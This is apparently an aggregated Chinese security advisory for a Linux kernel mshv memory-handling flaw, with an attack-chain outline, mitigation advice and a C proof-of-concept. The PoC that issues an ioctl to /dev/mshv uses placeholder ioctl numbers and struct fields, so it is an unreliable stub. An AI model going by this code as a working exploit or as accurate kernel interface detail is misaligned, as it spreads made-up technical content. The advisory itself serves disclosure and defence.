CVE-2026-43045 CVSS 5.5 中危

CVE-2026-43045: Linux内核mshv内存损坏漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43045

漏洞类型

内存损坏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的mshv_region_pin函数存在错误处理缺陷。首先，pin_user_pages_fast()可能返回部分固定的页面数，但代码将其视为成功，导致部分固定的区域被使用，引发内存损坏。其次，当循环过程中发生错误时，当前批次中已固定的页面在调用mshv_region_invalidate_pages()前未被正确统计，导致页面引用泄漏。本地低权限攻击者可利用此漏洞导致系统拒绝服务或内存资源耗尽。

技术细节

该漏洞位于Linux内核的Microsoft Hyper-V接口（mshv）子系统中。mshv_region_pin函数负责将用户空间内存页固定到内核中。漏洞根源在于该函数未正确处理pin_user_pages_fast()的返回值。当该函数返回的固定页面数少于请求的数量（即“短固定”）时，代码错误地将其视为完全成功，继续使用未完全初始化或未正确固定的内存区域，导致内核内存损坏。此外，在处理过程中若发生错误跳转到清理逻辑时，当前批次已固定页面的计数未被更新，导致mshv_region_invalidate_pages无法正确释放这些页面，引发引用计数泄漏。攻击者通过本地调用相关接口，构造触发短固定或中途错误的条件，可导致系统崩溃或权限提升（取决于内存损坏的可控性，当前CVSS主要影响可用性）。

攻击链分析

STEP 1

步骤1: 本地访问

攻击者需要获取本地系统的低权限访问权限。

STEP 2

步骤2: 触发漏洞

攻击者调用mshv接口的mshv_region_pin功能，传入特定的内存参数，试图诱导pin_user_pages_fast返回部分固定页面或在循环中出错。

STEP 3

步骤3: 内存破坏

由于错误处理缺陷，内核使用了部分固定的内存区域或未能正确释放页面引用，导致内存损坏或资源泄漏。

STEP 4

步骤4: 拒绝服务

内存损坏导致内核崩溃或系统资源耗尽，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

// Conceptual PoC for CVE-2026-43045
// This code attempts to trigger the vulnerability in mshv_region_pin
// by invoking the ioctl with crafted parameters.

#define MSHV_IOCTL_PIN_REGION 0x1234 // Example IOCTL number

struct mshv_pin_region_args {
    unsigned long addr;
    unsigned long size;
    // ... other fields ...
};

int main() {
    int fd;
    struct mshv_pin_region_args args;
    
    // Open the mshv device (requires appropriate privileges or access)
    fd = open("/dev/mshv", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    // Craft arguments to potentially trigger short pin or error
    // Using a very large size or unmapped address might trigger the path
    args.addr = (unsigned long)malloc(4096);
    args.size = 0xFFFFFFFF; // Large size to stress pin_user_pages_fast

    printf("Attempting to trigger vulnerability...\n");
    
    // Invoke the vulnerable ioctl
    if (ioctl(fd, MSHV_IOCTL_PIN_REGION, &args) < 0) {
        perror("IOCTL failed (expected if system patched or conditions not met)");
    } else {
        printf("IOCTL succeeded. Check kernel logs for memory corruption.\n");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (stable branch commit a7d149152bc5a9119854331c57be35ad31fdf5cc 之前)

Linux Kernel (stable branch commit c0e296f257671ba10249630fe58026f29e4804d9 之前)

防御指南

临时缓解措施

建议立即应用官方提供的补丁进行内核升级。如果无法立即升级，且系统不依赖Microsoft Hyper-V功能，可通过禁用mshv内核模块（如rmmod mshv）来降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表